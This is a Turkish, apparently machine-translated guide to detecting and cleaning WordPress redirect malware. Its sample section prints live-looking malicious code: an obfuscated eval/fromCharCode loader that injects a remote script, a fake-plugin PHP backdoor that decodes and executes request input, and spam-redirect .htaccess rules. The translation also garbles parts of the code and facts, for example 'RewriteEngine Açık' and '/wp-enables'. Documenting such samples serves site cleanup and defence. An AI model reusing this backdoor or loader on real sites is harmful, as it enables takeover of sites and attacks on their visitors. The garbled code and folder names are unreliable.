WordPress yönlendirme hilesi? Bir web sitesi nasıl temizlenir?

Yazdır · Время на чтение: 27min · tarafından · Yayınlanan · Güncellenmiş

oynamakBu makaleyi dinle

WordPress, yönlendirme yönlendirmeli kötü amaçlı yazılım bulaşmıştır. Kötü amaçlı yönlendirme

Kötü amaçlı WordPress yönlendirmesiWordPress'e kötü amaçlı yönlendirme. WordPress web siteniz veya yönetici paneliniz otomatik olarak bir spam sitesine yönlendiriyorsa, web siteniz muhtemelen saldırıya uğramış ve yeniden yönlendirme kötü amaçlı yazılımlarından etkilenmiştir. Peki, sitenizdeki saldırıya uğramış bir WordPress yönlendirme kötü amaçlı yazılımıyla ne yapabilirsiniz? Her şeyden önce, hesabınızı tarayarak hack olup olmadığını onaylayın.

Burada zamanın en iyi arkadaşınız olduğunu hatırlamak önemlidir. Bunun için endişelenerek zaman kaybetmeyin. Saldırıyı tamamen düzelteceğiz ve siteniz temizlenebilir. Ama hızlı hareket etmelisin.

Sitenizden kötü niyetli yönlendirmeleri kaldırmanıza, sitenizi düzeltmenize ve bunun tekrarlanmamasını sağlamanıza yardımcı olacak adımlarda size yol göstereceğim. WordPress yönlendirme hackinin birden fazla varyasyonu ile, köküne ulaşmak zor olabilir. Bu makale, kötü amaçlı yazılımları hızlı bir şekilde bulup adım adım kaldırmanıza yardımcı olacaktır.

Makalenin içeriği:

WordPress'te saldırıya uğramış bir yönlendirme (kötü amaçlı yönlendirme) ne anlama gelir?

Saldırıya uğramış bir WordPress yönlendirmesi, kötü amaçlı bir yönlendirmedir.
Saldırıya uğramış yönlendirme WordPress, web sitenize kötü amaçlı kod enjekte edildiğinde gerçekleşir ve bu kod daha sonra ziyaretçilerinizi otomatik olarak başka bir web sitesine yönlendirir. Tipik olarak, hedef web sitesi spam, gri pazar farmasötik ürünleri veya yasa dışı hizmetler içerir.

Bu davranışa neden olan favicon kötü amaçlı yazılımı gibi birçok kötü amaçlı yazılım türü vardır, bu nedenle WordPress kötü amaçlı yazılım yönlendirme saldırısı, baskın belirtiye atıfta bulunan genel bir terimdir: kötü amaçlı yönlendirmeler.

Bu tür bir saldırı milyonlarca web sitesini etkiler ve her gün korkunç kayıplara neden olur. Web siteleri gelir, marka bilinci oluşturma ve SEO sıralamalarını kaybediyor, toparlanma stresinden bahsetmiyorum bile.

Ancak, bilgisayar korsanlığıyla ilgili en kötü şey, daha da kötüye gitmesidir. Kötü amaçlı yazılım, dosyalar ve klasörler ve hatta web sitesi veritabanınız aracılığıyla yayılır, kendini kopyalar ve web sitenizi başkalarına bulaştırmak için kullanır.

Bu makalenin ilerleyen kısımlarında bir saldırının belirli sonuçlarına değineceğim, ancak web sitenizi kurtarmak için önceliğinizin hemen harekete geçmek ve ertelememek olduğunu söylemekle yetineceğim.

WordPress sitemin spam'e yönlendirilip yönlendirilmediğini nasıl anlarım?

ile sorunu çözmeden önce saldırıya uğramış bir WordPress sitesini yeniden yönlendirme, öncelikle sitenizin kesinlikle saldırıya uğradığını belirlememiz gerekiyor. Enfeksiyonda olduğu gibi, saldırıların da semptomları vardır. Ardından, belirtileri belirledikten sonra, birkaç testle tanıyı doğrulayabilirsiniz.

Daha önce belirtildiği gibi, otomatik yönlendirmeler, bir WordPress yönlendirme saldırısının kesin bir işaretidir. Spam yönlendirmeleri, arama sonuçlarında, belirli sayfalarda veya hatta web sitenize giriş yapmaya çalıştığınızda gerçekleşebilir. Yönlendirmelerle ilgili sorun, bunların her zaman tutarlı veya güvenilir bir şekilde gerçekleşmemesidir.

Örneğin, sitenize gittiyseniz ve yönlendirildiyse, ikinci, üçüncü veya dördüncü sefer olmayabilir. Bilgisayar korsanları akıllıdır ve sorunun yalnızca bir kez olmasını sağlamak için bir tanımlama bilgisi oluştururlar.

Bunun sonucu olarak, bunun bir kaza olabileceğini hissettiğinizde yanlış bir güvenlik duygusuna kapılmak kolaydır. Bunun kodda bir hata olma ihtimali çok küçük ama "minik" dediğimde sonsuz küçük bir şansı kastediyorum.

WordPress'te Saldırıya Uğramış Yönlendirme İşaretlerini Kontrol Edin

Kural olarak, hack'ler kendilerini farklı şekillerde gösterir. Ayrı ayrı bunlar, eski bir izleme kodu gibi web sitesi hataları olabilir, ancak web sitenizde bu belirtilerden iki veya daha fazlasını görürseniz, web sitenizin saldırıya uğradığından emin olabilirsiniz.

  • WordPress sitesi bir spam sitesine yönlendiriyor: Bir WordPress yönlendirme saldırısının klasik bir belirtisi. Kötü amaçlı yazılımın varyantına bağlı olarak, yönlendirme farklı şekillerde veya sitenizin farklı yerlerinde gerçekleşebilir.
    Otomatik yönlendirmeler: Kötü amaçlı yazılım, birisi sitenizi ziyaret ettiğinde ziyaretçilerinizi otomatik olarak spam sitelerine yönlendirir. Bu, birisi sitenize Google veya Yandex'den girdiğinde de olur. Tipik olarak, sitenize giriş yapmaya çalışırsanız da yönlendirileceksiniz.
    Bağlantı yönlendirme: Birisi bir bağlantıya tıklar ve ardından başka bir web sitesine yönlendirilir. Bu özellikle akıllıdır, çünkü ziyaretçiler yine de başka bir konuma yönlendirilmeyi bekleyen bağlantılara tıklarlar.
    Yalnızca mobil cihazlar için yönlendirmeler: Sadece web sitenize mobil cihaz üzerinden giriş yapıldığında yönlendirilir.
  • Google sonuçları "Site saldırıya uğramış olabilir" mesajını gösteriyor: Web siteniz arama sonuçlarında göründüğünde küçük bir mesaj görünür: "Site saldırıya uğramış olabilir" - başlığın hemen altında görünecektir. Bu, Google'ın potansiyel olarak saldırıya uğramış bir siteye karşı ziyaretçileri uyarma yöntemidir.
  • Google kara listesi: En büyük kırmızı bayrak - kelimenin tam anlamıyla - Google'ın kara listesi, sitenizin saldırıya uğradığının kesin bir işaretidir. Ziyaretçileriniz farklı bir arama motoru kullanıyor olsalar bile, saldırıya uğramış siteleri işaretlemek için Google kara listesini de kullanıyorlar.
  • Yandex'de site yasağı: ayrıca, saldırıya uğramış bir web sitesinin kesin bir işaretidir, web sitenizin konumları Yandex arama sonuçlarından çıkacaktır. Belki ana sayfa kalacak ama bu bir gerçek değil.
  • Google Ads, web sitenizdeki komut dosyalarını işaretler: Web sitenizde reklam vermeye çalışırsanız, Google Ads web sitenizi tarar ve gönderilerinizdeki veya sayfalarınızdaki yönlendirme senaryolarına karşı sizi uyarır.
  • Web barındırıcısı hesabınızı askıya aldı: Web siteleri, web sitelerini birkaç nedenden dolayı askıya alır ve kötü amaçlı yazılım ana nedenlerden biridir. Web sitenize erişmeye çalışırken bu mesajı görürseniz, herhangi bir nedenle e-postanızı kontrol edin. Alternatif olarak, destek ekibiyle iletişime geçin.
  • İnsanlar sitenizden şikayetçi: Bilgisayar korsanlığının en korkunç yanı, iyi bir güvenlik eklentisi kurulu olmadıkça, genellikle web sitesi yöneticilerinin bir bilgisayar korsanlığı hakkında en son bilgi sahibi olmalarıdır. Pek çok kişi bunu öğreniyor çünkü web sitesi ziyaretçileri ve kullanıcılar web sitesinin spam'e yönlendirilmesinden ve hatta gereksiz e-posta almasından şikayet ediyor.

Yukarıda listelenen belirtilerden herhangi birini görürseniz, bununla ilgili bilgileri yazmak iyi bir fikirdir. Hangi tarayıcıyı kullandın? Hangi cihazı kullandın? Bu bilgi, karşılaştığınız WordPress korsanlığı kötü amaçlı yazılım türünü belirlemenize ve bu nedenle onu daha hızlı ortadan kaldırmanıza yardımcı olabilir.

Sitenize bir yönlendirme saldırısının bulaştığını onaylayın

Belirtiyi keşfetmenin bir sonraki adımı, bunun gerçekten bir hack olduğundan emin olmaktır. Web sitenizin kötü amaçlı yönlendirmelere açık olduğundan emin olmanın en hızlı yolu, web sitenizi taramaktır.

1. Sitenizi bir güvenlik eklentisi ile tarayın

100 %'de web sitenizin saldırıya uğradığından hala emin değilseniz, onaylamak için ücretsiz bir çevrimiçi tarayıcı kullanın. Çok yaygın bir durum, web sitenize bir mobil cihazdan erişilmesidir; bu, .htaccess dosyasındaki kötü amaçlı yazılımı gösterir. Ya da sıklıkla gördüğümüz, otomatik olarak yeniden yönlendiren bir sayfa kesmesidir. Bu, veritabanında kötü amaçlı yazılım olduğunda olur.

Makalenin ilerleyen kısımlarında, kötü amaçlı yazılımın diğer türevlerine bakacağız. Şu anda, WordPress tarafından ele geçirilen doğrudan kötü amaçlı yazılımın sitenizin hemen hemen her yerinde olabileceğini vurgulamak istiyorum.

Bu nedenle, her tarayıcı onu farklı şekilde etiketleyecektir. Örneğin, Quttera kötü amaçlı yazılımı şu şekilde işaretler:

Tehdidin adı: AlienFile geni yaşayın

Ve WordFence, bunun gibi bir sürü bilinmeyen dosya hakkında bir uyarı gösterecek:

* WordPress çekirdeğinde bilinmeyen dosya: wp-admin/css/colors/blue/php.ini
* WordPress çekirdeğinde bilinmeyen dosya: wp-admin/css/colors/coffee/php.ini
* WordPress çekirdeğinde bilinmeyen dosya: wp-admin /css/colors/ectoplazmm/php.ini

Bunlar, sitenizin saldırıya uğradığına dair iyi işaretlerdir, çünkü daha sonra göreceğimiz gibi, /wp-admin klasörü WordPress kurulumunuzdaki çekirdek dosyalardan başka bir şey içermemelidir.

Bunu söyledikten sonra maalesef kaldırma işlemine yardımcı olmuyor. Diğer güvenlik eklentilerinin, algılama mekanizmaları nedeniyle kötü amaçlı yazılımları nasıl işaretlediğiyle ilgili birkaç önemli sorun vardır. Birçok yanlış pozitif, eksik dosya ve diğer birçok sorun var. Web siteniz önemlidir, bu nedenle güvenlik eklentinizi akıllıca seçin.

2. Bir çevrimiçi güvenlik tarayıcısıyla tarayın

Saldırıya uğramış yeniden yönlendirme kötü amaçlı yazılımlarını kontrol etmek için Sucuri SiteCheck gibi bir çevrimiçi güvenlik tarayıcısı da kullanabilirsiniz. Bir çevrimiçi güvenlik tarayıcısı veya harici bir tarayıcı, sayfalarınızdaki ve yayınlarınızdaki kodu tarayarak kötü amaçlı komut dosyaları arar.

Bir ön uç tarayıcıyla ilgili tek sorun, yalnızca erişebildiği kodu tarayabilmesi ve tarayabilmesidir. Yani, temelde sayfaların ve gönderilerin kaynak kodu. Bu sayfalarda saldırıya uğramış birçok yönlendirme kötü amaçlı yazılımı olmasına rağmen, çekirdek dosyalarda birkaç seçenek vardır. Harici tarayıcı bunları hiç göstermeyecektir.

Birinci basamak teşhis aracı olarak bir çevrimiçi güvenlik tarayıcısı kullanmanızı tavsiye ederim. Pozitif çıkarsa, pozitif olduğundan emin olabilir ve hack'i düzeltmeye çalışabilirsiniz. Negatif çıkarsa, ön uç tarayıcı tarafından taranmayan yerleri manuel olarak kontrol edebilirsiniz. Bu şekilde manuel çalışmanın bir kısmını ortadan kaldırabilirsiniz.

3. Siteyi kötü amaçlı yazılımlara karşı manuel olarak tarayın

Saldırıya uğramış yeniden yönlendirme kötü amaçlı yazılımını aramak için bir güvenlik eklentisi kullanıyorsanız bu bölümü tamamen atlayabilirsiniz. İyi bir güvenlik eklentisi, tam olarak aşağıda önerdiğim şeyi yapar, ancak çok daha hızlı ve daha iyi.

Web sitenizi kötü amaçlı yazılımlara karşı taramak, temelde dosyalarda ve veritabanında istenmeyen kod aramak anlamına gelir. "Önemsiz kodun" bir yönlendirme olarak yararsız olduğunu anlıyorum, ancak seçenekler nedeniyle, bir hack'i hızlı bir şekilde bulup ilan edebileceğiniz tek bir satır yok.

Ancak bir sonraki bölümde, diğer web sitelerinde bulunan birkaç kötü amaçlı yazılım örneğini listeledim. Bir sonraki bölümde, gözlemlenen yönlendirme davranışına bağlı olarak kötü amaçlı yazılımın eklendiği tipik yerlerden bahsedeceğiz.

WordPress Yönlendirme Kötü Amaçlı Yazılımı Neye benziyor?

Bu makaledeki bu satırı abartıyorum, ancak WordPress hack yönlendirme kötü amaçlı yazılımının birçok seçeneği var ve bu nedenle, "Bunu arayın!"

Ancak, bazı kötü amaçlı kodların neye benzediği hakkında size bir fikir verebilirim:

  • Kod, sayfa başlığında veya wp_posts tablosunun tüm sayfalarında olabilir. İşte bazı örnekler:

 

type='text/javascript' src='//www.dekeine.nl/wp-content/count.php?s=8131599557550&ver=5.7.2' id='hello_newscript5-js'> type='text/javascript' src='https://store.don/tkinhoo/ot./tw/m.js?w=085'> type='text/javascript' zaman uyumsuz src='https://db.d/live/rygoo/stra/tegy./com/js.min.js?s=p&'> type='text/javascript' src='https://coun/.tr/acks/tatis/icsss/./com/stm?v=l6.0.0'> type=text/javascript src='https://des/.coll/ectf/at/rac/ks./com/t.js'> src='https://js/donatel/firstly.ga/stat.js?n=ns1' type='text/javascript'>

  • wp_options tabloları, site_url'de tanıdık olmayan URL'lere sahip olabilir. İşte bazı örnekler:
stat/traksatiticss dest/colecfattracks gotosecnd ws.stienernando

 

  • Komut dosyaları da gizlenebilir, bu da gerçek kodu çıkarmak için onları çevrimiçi bir kod gizleme aracı aracılığıyla çalıştırmanız gerektiği anlamına gelir.

karışık kod

eval(StringfromCharCode32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,112,111,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116, 39,41,59,10,32,32,32,32,112,111,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,10,32,32,32,32,112,111,46,115,114, 99,32,61,32,39,104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,118,61,110,52,39,59,10,32,32,32,32,118, 97,114,32,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,115,99,114,105,112,116,39,41,91,48,93,59,10,32,32, 32,32,115,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,112,111,44,32,115,41,59,10,32,32,125,41,40,41,59));')

Ve aslında ne anlama geliyor:

(function() var po = document.createElement('script'); po.type = 'text/javascript'; po.src = eloperatss.sat?v=n4'; var s = document.getElementsByTagName('script') [0];s.parentNode.insertBefore(po, s); )();
  • Sahte eklentiler, açıldığında şuna benzeyen dosyalara sahip olabilir:
<?php /** * Plugin Name: Wp Zzz * Plugin URI: https://wpforms.com * Description: Default WordPress plugin * Author: WPForms * Author URI: https://wpforms.com * Version: 1.6.3.1 * */ function simple_init() { $v = "base".chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; if(isset($_REQUEST['lt']) && md5($_REQUEST['lt']) == $v("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) { $n = "file_put_contents"; $lt = $v($_REQUEST['a']);$n('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);die();}else{@eval($v($lt));}}else{if(isset($_REQUEST['lt'])){echo $v('cGFnZV9ub3RfZm91bmRfNDA0');}} } add_action('init','simple_init'); function my_custom_js() { echo ' '; } add_action('admin_head', 'my_custom_js' ); add_action('wp_head', 'my_custom_js');
  • Mobil yönlendirmeler, .htaccess dosyasındaki değişiklikleri gösterir. Aşağıdaki kod https://daily-prize-best /life/?u=y2ykaew&o=2xup89r&m=1&t=mns2 adresine yönlendirir.
RewriteEngine Açık RewriteRule ^.+\.txt$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.htm$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.html$ https:/ /bit.ly/3iZl8mm [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . https://bit.ly/3iZl8mm[L] RewriteBase / RewriteRule Üzerinde RewriteEngine ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php[L]

Yeniden Yönlendirilmiş Kötü Amaçlı Yazılım Aranacak Yerler

WordPress iki ana bölüme ayrılmıştır: dosyalar ve veritabanı. Saldırıya uğramış yeniden yönlendirme kötü amaçlı yazılımıyla ilgili sorun, her yerde olabilmesidir.

Web sitenizin kodunu değiştirmeye aşina iseniz, bahsettiğim yönlendirme kodunu aşağıdaki yerlerde bulabilirsiniz. Şüpheli eklentileri aramak için web sitenizin (hem dosyalar hem de veritabanı) bir yedek kopyasını indirin.

Yine, klasik, durumsal, cihaza özel ve hatta paket yönlendirmeler gibi seçeneklerin olduğunu unutmayın. Kod, konum gibi her biri için farklı olacaktır.

A. Web sitesi dosyaları

  • WordPress Çekirdek DosyalarıA: En basitlerinden başlayarak, /wp-admin ve /wp-includes yeni bir WordPress kurulumundan farklı olmamalıdır. Aynısı index.php, settings.php ve load.php dosyaları için de geçerlidir. Bunlar temel WordPress dosyalarıdır ve ayarlar bunlarda herhangi bir değişiklik yapmaz. Herhangi bir değişiklik olup olmadığını görmek için yeni bir WordPress kurulumuyla karşılaştırın. .htaccess dosyası özel bir durumdur. Bir mobil yönlendirme hack'i neredeyse her zaman bu dosyada görünecektir. Cihaza özgü davranışı tanımlayan kullanıcı aracısı kuralını arayın ve yeniden yönlendirme komut dosyasını kontrol edin.
  • Aktif Tema Dosyaları: Yüklü birden fazla temanız varsa (başlangıçta önerilmez), bunlardan yalnızca birinin etkin olduğundan emin olun. Ardından, garip kod için header.php, footer.php ve functions.php gibi etkin tema dosyalarınızı inceleyin. Bunu test etmenin iyi bir yolu, geliştiricilerin sitelerinden bozulmamış kurulumları indirmek ve kodu bu dosyalarla eşleştirmektir. Tipik olarak, bu dosyaların belirli bir biçimde olması gerekir, bu nedenle çöp kodu öne çıkar. Ayarların kodu da değiştireceğini unutmayın. Ayrıca, sıfırlanmış temalar veya eklentiler kullanıyorsanız, tanılamayı hemen burada durdurabilirsiniz, çünkü onlar yüzünden saldırıya uğradığınızı garanti edebiliriz.
  • Sitenizdeki sahte eklentiler: Evet, durum bu. Bilgisayar korsanları, kötü amaçlı yazılımları maskeleyerek mümkün olduğunca yasal hale getirir. wp-content/plugins klasörüne gidin ve bir göz atın. Yüklemediğiniz bir şey mi var? Bazı tuhaf kopyalar mı? Herhangi birinin klasörlerinde yalnızca bir veya iki dosya var mı?

İşte bazı örnekler:

/wp-content/plugins/mplugin/mplugin.php /wp-content/plugins/wp-zzz/wp-zzz.php /wp-content/plugins/Plugin/plug.php

Yüklü çok sayıda eklentiniz varsa, hepsini kontrol etmek zor olabilir. Sahte eklentileri tespit etmenin temel kuralı, geleneksel olarak meşru eklenti adlarının nadiren büyük harfle başlaması ve adlarının kısa çizgi dışında özel karakterler içermemesidir. Bunlar kural değil, sözleşmelerdir. Bu nedenle, sahte olanları kesin olarak belirlemek için onlara çok fazla önem vermeyin. Bir eklentinin sahte olduğundan şüpheleniyorsanız, Google'da arayın ve orijinal sürümünü WordPress deposunda bulun. Oradan indirin ve dosyaların eşleşip eşleşmediğini kontrol edin.

B. Veritabanı

  • wp_posts tablosu: Kötü amaçlı komut dosyaları genellikle her sayfada bulunur. Ancak daha önce de söylediğimiz gibi bilgisayar korsanları çok kurnazdır. Bir saldırı olmadığına karar vermeden önce iyi bir gönderi örneğine göz atın. Sayfalarınızın ve gönderilerinizin kodunu kontrol etmenin başka bir yolu da, bir tarayıcı kullanarak sayfanın kaynak kodunu kontrol etmektir. Sitenizdeki her sayfa, tarayıcılar tarafından okunabilen bir HTML koduna sahiptir. Sayfanın kaynak kodunu açın ve üstbilgi, altbilgi ve komut dosyası etiketleri arasındaki her şeyi yerinde görünmeyen şeyler için kontrol edin.Baş bölümü, tarayıcının o sayfayı yüklemek için kullandığı ancak ziyaretçiye gösterilmeyen bilgileri içerir. Kötü amaçlı yazılım komut dosyaları genellikle burada gizlenir, bu nedenle sayfanın geri kalanından önce yüklenirler.
  • wp_options tablosu: siteurl'u kontrol edin. Bu, 99% durumlarda web sitenizin URL'si olmalıdır. Olmazsa, burası senin hackin.

Ancak, şimdi herhangi bir şeyi kaldırmaya çalışmanın zamanı değil. Javascript veya PHP betiklerinin kesinlikle kötü niyetli olduğundan tamamen emin olmalısınız. Kötü amaçlı yazılımlardan çok hızlı bir şekilde kurtulmak istiyorsunuz, ancak acele etmek sizi çalışmayan bir siteye yönlendirecektir.

Kötü Amaçlı Yazılım Yönlendirmelerini Kontrol Etmenin Diğer Yolları

Bir web sitesi yöneticisi olarak yukarıda listelenen belirtilerin tümünü göremeyebilirsiniz. Bilgisayar korsanları, mümkün olduğu kadar uzun süre fark edilmeden kalmak istedikleri için IP'nizi ve hesabınızı bir saldırının sonuçlarını görüntülemekten akıllıca hariç tutarlar.

Ayrıca, belirtiyi bir kez görebilir ve ardından yeniden oluşturamayabilirsiniz. Bütün bunlar çok kafa karıştırıcı. Doğrudan web sitenizde görmüyorsanız belirtileri kontrol etmenin başka yolları da vardır.

  • Google Arama Konsolunu Kontrol Edin: Güvenlik Sorunları bölümünde kötü amaçlı yazılım bulaşmasını işaretlerler.
  • Web sitenize erişmek için gizli bir tarayıcı kullanınortalama bir ziyaretçinin ne gördüğünü görmek için
  • Olağandışı kullanıcı etkinliği için etkinlik günlüklerini kontrol edinkullanıcı ayrıcalıklarını yükseltmek veya mesaj oluşturmak gibi.

Bir sonraki bölüm yalnızca silme ile ilgilidir. Derin bir nefes alın ve bir fincan çay veya kahve için. Tüm süreci birlikte inceleyelim.

WordPress saldırıya uğramış yönlendirme enfeksiyonu nasıl kaldırılır?

Artık web sitenizin başka bir siteye yönlendirildiğini bildiğimize göre, hızlı hareket etmeniz gerekiyor. Kötü amaçlı yazılım web sitenizdeki daha fazla dosya ve klasöre yayıldığı için zaman geçtikçe bilgisayar korsanlığı sayısı katlanarak artar. Bu sadece hasarı artırmakla kalmaz, aynı zamanda iyileşmeyi de çok daha zorlaştırır.

Bu bölüme gelmeden önce web sitenizi zaten taradığınızı varsayıyorum. Ancak, yapmadıysanız, yapmanız gereken ilk şey web sitenizi taramak.

Sitenizden kötü amaçlı yönlendirmeleri kaldırmanın 2 ana yolu vardır. Bilgisayar korsanlarının bir web sitesine verebileceği zararı ilk elden gördüğüm için güvenlik eklentisini kullanmanızı şiddetle tavsiye ederim.

1. (ÖNERİLEN) Yönlendirme virüsünü kaldırmak için bir güvenlik eklentisi kullanın

Güvenlik eklentileri, tespit edilmesi zor kötü amaçlı yazılımları kaldırmak için kullanılır. Tek yapmanız gereken eklentiyi sitenize yüklemek ve sitenizin eski haline dönmesi için birkaç dakika beklemek.

Web sitenizin saldırıya uğradığını doğrulamak için bir tarayıcı kullandıysanız, yapmanız gereken tek şey sitenizi güncellemek ve sitenizi geri almaktır.

Bu tür eklentileri kullanmanızın tavsiye edilmesinin birkaç nedeni vardır:

  1. Yalnızca kötü amaçlı yazılımları kaldırın ve sitenizi olduğu gibi bırakın;
  2. Bilgisayar korsanlarının yeniden bulaşmak için bıraktığı arka kapıları bulun ve bunları kaldırın;
  3. Sitenizi kötü amaçlı trafikten korumak için yerleşik güvenlik duvarı.

wp-admin'e erişemiyorsanız

Bu durumda, yardım için acil kötü amaçlı yazılım temizleme servisiyle iletişime geçin. Özel bir güvenlik uzmanı, web sitenizi hızlı bir şekilde temizleyecek ve kısa sürede yedeklenip çalışır durumda olduğundan emin olacaktır.

2. WordPress Yönlendirme Kötü Amaçlı Yazılımını Manuel Olarak Kaldırın

Manuel yönlendirme kötü amaçlı yazılımını web sitenizden kaldırmak mümkündür, ancak bunun için ön koşullar vardır.

- Öncelikle, WordPress'in nasıl yapılandırıldığını bilmeniz gerekir. Çekirdek dosyaların nasıl göründüğünden, her eklentinin ve temanın birlikte çalışmak için oluşturduğu klasörlere ve dosyalara kadar. Gerekli bir dosyanın silinmesi sitenizi çökertebilir, bu nedenle siteniz yalnızca saldırıya uğramakla kalmaz, aynı zamanda devre dışı bırakılır.

- İkinci olarak, iyi kodu kötüden ayırt edebilmelisiniz, yani; kötü amaçlı yazılım. Kötü amaçlı kod, meşru kod olarak gizlenir veya okunamayacak şekilde gizlenir. İyi kodu kötü koddan ayırmak çok zordur, bu nedenle birçok tarayıcı yanlış pozitiflerden muzdariptir.

NotC: Kötü amaçlı yazılımları kaldırmak için bir WordPress uzmanı tutabilirsiniz. Güvenlik uzmanlarının pahalı olduğunu ve bir hack'i ortadan kaldırmanın zaman alacağını unutmayın.

Ayrıca, tekrarlamayacağınızı garanti etmezler. Ancak yine de kötü amaçlı yazılımları manuel olarak kaldırmaya çalışmak yerine bu yöntemi öneriyorum.

Tamam, bunlar uyarılar. Yönlendirme kötü amaçlı yazılımını sitenizden kaldırma adımları şunlardır:

1. Sitenizi yedekleyin

Herhangi bir işlem yapmadan önce mutlaka yedek alın. Site saldırıya uğrasa bile çalışmaya devam eder. Bu nedenle, kötü amaçlı yazılım temizleme işlemi sırasında bir şeyler ters giderse, geri dönebileceğiniz bir yedeğiniz olur. Saldırıya uğramış bir siteyi temizlemek zordur. Bozuk bir web sitesini temizlemek daha da zordur ve bazen kurtarmak imkansızdır.

Web sunucusu sitenizi askıya alabilir ve hatta kaldırabilir. O zaman web sitenize erişmek, onu kazımak için bile büyük bir sorundur. Askıya alınan siteye erişmek için web barındırıcısının destek ekibiyle iletişime geçmeniz gerekecek, ancak sitenin silinmesi yedekleme olmadan yapılamaz.

2. WordPress'in temiz bir sürümünü indirin

Yeni WordPress kurulumlarının yanı sıra kullandığınız tüm eklentileri ve temaları indirin. Sürümler, sitenizdekilerle eşleşmelidir.

Bunları indirdikten sonra, web sitenizin dosyalarıyla karşılaştırmak için boş dosyaları kullanabilirsiniz. Farkları bulmak için çevrimiçi fark denetleyiciyi kullanabilirsiniz, çünkü kesinlikle manuel olarak bakmanızı önermiyoruz.

Temelde bu, çoğu güvenlik tarayıcısının yaptığı imza eşleştirmedir. Ancak, en azından artık sitenizin düzgün çalışması için hangi dosya ve klasörlerin gerekli olduğunu biliyorsunuz. Bu aşamada hiçbir şeyi silmeyin. Hangi dosyaların gerekli olduğunu anlamak için taban çizgisini ayarlamanız yeterlidir.

3. Yeniden yönlendirme kötü amaçlı yazılımını arayın ve kaldırın

Bu belki de süreçteki en zor adımdır. Dediğim gibi, iyi kodu kötü koddan ayırt edebilmeniz ve ardından gerektiğinde onu kaldırmanız veya değiştirmeniz gerekir.

Temel WordPress dosyalarını temizleme

Web sitenizle aynı WordPress sürümünü almanız son derece önemlidir, aksi takdirde web sitenizin çökmesiyle karşılaşabilirsiniz. Yüklendikten sonra, web sitesi dosyalarınıza erişmek ve aşağıdaki klasörleri değiştirmek için cPanel veya FTP kullanın:

— /wp-admin
/wp-enables

Bu klasörler, WordPress tarafından web sitenizi çalıştırmak ve yüklemek için kullanılır ve kullanıcı içeriğini depolamak için tasarlanmamıştır. Bu işin kolay kısmıydı. Şimdi garip kod için aşağıdaki dosyaları kontrol edin:

- index.php
wp-config.php
wp-settings.php
- wp-load.php
- .htaccess

Ayrıca, /wp-uploads klasöründe PHP betiği olmamalıdır. "Garip kodun" çok belirsiz olduğunun farkındayım, ancak daha önce de söylediğimiz gibi, saldırıya uğramış bir WordPress yönlendirme kötü amaçlı yazılımının birçok seçeneği vardır.

Bu nedenle, bu dosyalarda tam olarak hangi kodu göreceğinizi söyleyemem. Kodun nasıl çalıştığını anlıyorsanız, her birinin ne yaptığını anlamak ve kodlardan herhangi birinin farklı bir şey yapıp yapmadığını görmek için WordPress dosyaları listesine başvurabilirsiniz. Bu kodu bulduğunuzdan emin olduktan sonra silin.

Temaları ve eklentileri kötü amaçlı yazılımlardan temizleyin

Tema ve eklenti ile ilişkili tüm dosya ve klasörler /wp-content klasöründe saklanır. Kodda nerede bir fark olduğunu görmek için web sitenizin dosyalarının her birini kontrol edebilirsiniz.

Burada bir uyarı: her değişiklik kötü değildir. Eklentilerinizden veya temalarınızdan herhangi birini özelleştirdiyseniz - ki muhtemelen sahipsinizdir - o zaman temiz bir kurulumdan farklılıklar olacaktır. Bu ayarları kaybetmenin bir sakıncası yoksa, devam edip dosyaları toplu olarak değiştirebilirsiniz.

Muhtemelen yaptığınız işi devam ettirmek isteyeceksiniz, bu nedenle farklılıkların her birine dikkatlice bakmaya başlayın. Kodun mantığını takip edebilirseniz, dosyaların birbirleriyle ve sitenizin geri kalanıyla nasıl etkileşime girdiğini anlayabilirsiniz. Bu, kötü amaçlı yazılımı bulmanızı ve kaldırmanızı sağlar.

Önemli sayıda temanız ve eklentiniz varsa, bu göz korkutucu bir görev olabilir. İşte başlamak için bazı iyi yerler:

  • Aktif Tema Dosyaları
    - header.php
    — footer.php
    — functions.php
  • Savunmasız eklentiler
    - Yakın zamanda hacklenen oldu mu?
    - Güncellenmeyen var mı
  • Sahte eklentiler
    - Çok az dosya
    - Bariz kopyalar

Bazı kötü amaçlı dosyalar zararsız görünür ve genellikle gerçek dosya adlarını taklit eder. Temiz kurulumların kullanışlı olduğu yer burasıdır, ancak tamamen emin değilseniz destek için eklenti ve tema geliştiricileriyle iletişime geçin.

Kötü amaçlı yazılımları WordPress veritabanından kaldırın

Temizlemek üzere veritabanını yüklemek için phpMyAdmin'i kullanın. Ardından, istenmeyen URL'ler veya anahtar kelimeler gibi şüpheli içerikler için tabloları kontrol edin. Kötü kod olduğundan ve değiştirilmiş iyi kod olmadığından emin olarak bu içeriği dikkatlice kaldırın.

Özellikle aşağıdaki tabloları kontrol edin:

— wp_options
— wp_posts

Web sitenizin boyutuna bağlı olarak, bu önemli miktarda zaman alabilir. Genel olarak, kötü amaçlı yazılım wp_posts tablonuzdaysa, her gönderide olacaktır. Çok fazla içeriğe sahip yüzlerce gönderiniz varsa, manuel olarak temizlemek çok büyük bir görevdir.

Ancak, kötü amaçlı yazılım komut dosyasını tanımladıktan sonra, SQL'i kullanabilir (veya SQL'den anlayan birinden komut dosyasını her iletiden kaldırmasını isteyebilirsiniz). Buradaki uyarı, bunun masadaki tek kötü amaçlı yazılım olduğundan emin olamamanızdır.

